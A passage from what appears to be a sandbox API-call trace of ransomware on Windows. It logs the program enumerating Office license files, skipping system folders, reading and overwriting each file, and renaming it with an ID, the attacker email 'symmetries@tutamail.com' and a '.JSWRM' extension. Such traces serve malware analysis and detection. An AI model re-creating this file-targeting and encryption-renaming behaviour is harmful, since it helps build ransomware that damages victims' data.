(HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0104.290] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0104.290] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0104.291] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0104.291] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0104.291] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0104.291] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0104.291] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247990 [0104.291] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0104.291] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0104.291] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoVL_MAK-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondovl_mak-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoVL_MAK-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondovl_mak-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0104.291] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247990 | out: hHeap=0x1e0000) returned 1 [0104.292] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0104.292] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0104.292] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0104.292] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f98 | out: hHeap=0x1e0000) returned 1 [0104.292] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe5125e2f, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe5125e2f, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe53ae71a, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x307e, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="MondoVL_MAK-ppd.xrm-ms", cAlternateFileName="MONDOV~2.XRM")) returned 1 [0104.292] lstrcmpiW (lpString1="MondoVL_MAK-ppd.xrm-ms", lpString2=".") returned 1 [0104.292] lstrcmpiW (lpString1="MondoVL_MAK-ppd.xrm-ms", lpString2="..") returned 1 [0104.292] lstrcmpiW (lpString1="MondoVL_MAK-ppd.xrm-ms", lpString2="...") returned 1 [0104.292] lstrcmpiW (lpString1="MondoVL_MAK-ppd.xrm-ms", lpString2="windows") returned -1 [0104.292] lstrcmpiW (lpString1="MondoVL_MAK-ppd.xrm-ms", lpString2="recovery") returned -1 [0104.292] lstrcmpiW (lpString1="MondoVL_MAK-ppd.xrm-ms", lpString2="perflogs") returned -1 [0104.292] lstrcmpiW (lpString1="MondoVL_MAK-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0104.292] lstrcmpiW (lpString1="MondoVL_MAK-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0104.292] lstrcmpiW (lpString1="MondoVL_MAK-ppd.xrm-ms", lpString2="system volume information") returned -1 [0104.292] lstrcmpiW (lpString1="MondoVL_MAK-ppd.xrm-ms", lpString2="msocache") returned -1 [0104.292] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0104.292] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoVL_MAK-ppd.xrm-ms", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0104.292] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0104.292] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoVL_MAK-ppd.xrm-ms", cchWideChar=22, lpMultiByteStr=0x241268, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MondoVL_MAK-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 22 [0104.292] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0104.292] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0104.292] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoVL_MAK-ppd.xrm-ms", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0104.292] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0104.292] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoVL_MAK-ppd.xrm-ms", cchWideChar=22, lpMultiByteStr=0x240fe8, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MondoVL_MAK-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 22 [0104.292] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0104.292] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0104.292] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0104.292] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0104.292] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0104.292] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23dbc0 [0104.292] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoVL_MAK-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondovl_mak-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0104.293] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=12414) returned 1 [0104.293] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.293] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x3070) returned 0x24c1d0 [0104.293] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x3070, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x3070, lpOverlapped=0x0) returned 1 [0104.295] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.295] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x3070, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x3070, lpOverlapped=0x0) returned 1 [0104.295] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0104.295] CloseHandle (hObject=0x45c) returned 1 [0104.295] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0104.296] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0104.296] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0104.296] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0104.296] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0104.296] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0104.296] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0104.296] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a300 [0104.296] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a300, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0104.296] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a300 | out: hHeap=0x1e0000) returned 1 [0104.296] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0104.296] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0104.296] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0104.296] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0104.296] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoVL_MAK-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondovl_mak-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoVL_MAK-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondovl_mak-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0104.297] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0104.297] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0104.297] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dbc0 | out: hHeap=0x1e0000) returned 1 [0104.297] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0104.297] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0104.297] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe565d12b, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe565d12b, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe57b4606, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d38, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="MondoVL_MAK-ul-oob.xrm-ms", cAlternateFileName="MOA9D3~1.XRM")) returned 1 [0104.301] lstrcmpiW (lpString1="MondoVL_MAK-ul-oob.xrm-ms", lpString2=".") returned 1 [0104.301] lstrcmpiW (lpString1="MondoVL_MAK-ul-oob.xrm-ms", lpString2="..") returned 1 [0104.301] lstrcmpiW (lpString1="MondoVL_MAK-ul-oob.xrm-ms", lpString2="...") returned 1 [0104.301] lstrcmpiW (lpString1="MondoVL_MAK-ul-oob.xrm-ms", lpString2="windows") returned -1 [0104.301] lstrcmpiW (lpString1="MondoVL_MAK-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0104.301] lstrcmpiW (lpString1="MondoVL_MAK-ul-oob.xrm-ms", lpString2="perflogs") returned -1 [0104.301] lstrcmpiW (lpString1="MondoVL_MAK-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0104.301] lstrcmpiW (lpString1="MondoVL_MAK-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0104.301] lstrcmpiW (lpString1="MondoVL_MAK-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0104.301] lstrcmpiW (lpString1="MondoVL_MAK-ul-oob.xrm-ms", lpString2="msocache") returned -1 [0104.301] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0104.301] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoVL_MAK-ul-oob.xrm-ms", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0104.301] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0104.301] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoVL_MAK-ul-oob.xrm-ms", cchWideChar=25, lpMultiByteStr=0x241290, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MondoVL_MAK-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 25 [0104.301] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0104.301] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d698 [0104.301] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoVL_MAK-ul-oob.xrm-ms", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0104.301] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0104.301] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoVL_MAK-ul-oob.xrm-ms", cchWideChar=25, lpMultiByteStr=0x2410d8, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MondoVL_MAK-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 25 [0104.301] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d698 | out: hHeap=0x1e0000) returned 1 [0104.301] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0104.301] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0104.301] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0104.301] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0104.301] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0104.302] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoVL_MAK-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondovl_mak-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0104.302] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11576) returned 1 [0104.302] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.302] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d30) returned 0x24c1d0 [0104.302] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d30, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d30, lpOverlapped=0x0) returned 1 [0104.304] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.304] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d30, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d30, lpOverlapped=0x0) returned 1 [0104.304] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0104.304] CloseHandle (hObject=0x45c) returned 1 [0104.304] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0104.304] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0104.305] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0104.305] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0104.305] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0104.305] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0104.305] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0104.305] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a408 [0104.305] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a408, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0104.305] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a408 | out: hHeap=0x1e0000) returned 1 [0104.305] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235df0 [0104.305] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23ddc8 [0104.305] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235df0 | out: hHeap=0x1e0000) returned 1 [0104.305] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0104.305] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoVL_MAK-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondovl_mak-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoVL_MAK-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondovl_mak-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0104.306] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ddc8 | out: hHeap=0x1e0000) returned 1 [0104.306] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0104.306] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0104.306] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0104.306] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0104.306] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe56f5a42, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe56f5a42, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe57da862, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4dd1, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="MondoVL_MAK-ul-phn.xrm-ms", cAlternateFileName="MOACCE~1.XRM")) returned 1 [0104.306] lstrcmpiW (lpString1="MondoVL_MAK-ul-phn.xrm-ms", lpString2=".") returned 1 [0104.306] lstrcmpiW (lpString1="MondoVL_MAK-ul-phn.xrm-ms", lpString2="..") returned 1 [0104.306] lstrcmpiW (lpString1="MondoVL_MAK-ul-phn.xrm-ms", lpString2="...") returned 1 [0104.306] lstrcmpiW (lpString1="MondoVL_MAK-ul-phn.xrm-ms", lpString2="windows") returned -1 [0104.306] lstrcmpiW (lpString1="MondoVL_MAK-ul-phn.xrm-ms", lpString2="recovery") returned -1 [0104.306] lstrcmpiW (lpString1="MondoVL_MAK-ul-phn.xrm-ms", lpString2="perflogs") returned -1 [0104.306] lstrcmpiW (lpString1="MondoVL_MAK-ul-phn.xrm-ms", lpString2="documents and settings") returned 1 [0104.306] lstrcmpiW (lpString1="MondoVL_MAK-ul-phn.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0104.306] lstrcmpiW (lpString1="MondoVL_MAK-ul-phn.xrm-ms", lpString2="system volume information") returned -1 [0104.306] lstrcmpiW (lpString1="MondoVL_MAK-ul-phn.xrm-ms", lpString2="msocache") returned -1 [0104.306] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d728 [0104.306] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoVL_MAK-ul-phn.xrm-ms", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0104.306] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0104.306] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoVL_MAK-ul-phn.xrm-ms", cchWideChar=25, lpMultiByteStr=0x241380, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MondoVL_MAK-ul-phn.xrm-ms", lpUsedDefaultChar=0x0) returned 25 [0104.306] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d728 | out: hHeap=0x1e0000) returned 1 [0104.306] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0104.306] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoVL_MAK-ul-phn.xrm-ms", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0104.306] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0104.306] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoVL_MAK-ul-phn.xrm-ms", cchWideChar=25, lpMultiByteStr=0x2410d8, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MondoVL_MAK-ul-phn.xrm-ms", lpUsedDefaultChar=0x0) returned 25 [0104.306] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0104.306] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0104.306] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0104.306] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0104.306] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0104.307] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0104.307] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoVL_MAK-ul-phn.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondovl_mak-ul-phn.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0104.307] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=19921) returned 1 [0104.307] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.307] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4dd0) returned 0x24c1d0 [0104.307] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x4dd0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x4dd0, lpOverlapped=0x0) returned 1 [0104.310] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.310] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x4dd0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x4dd0, lpOverlapped=0x0) returned 1 [0104.310] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0104.310] CloseHandle (hObject=0x45c) returned 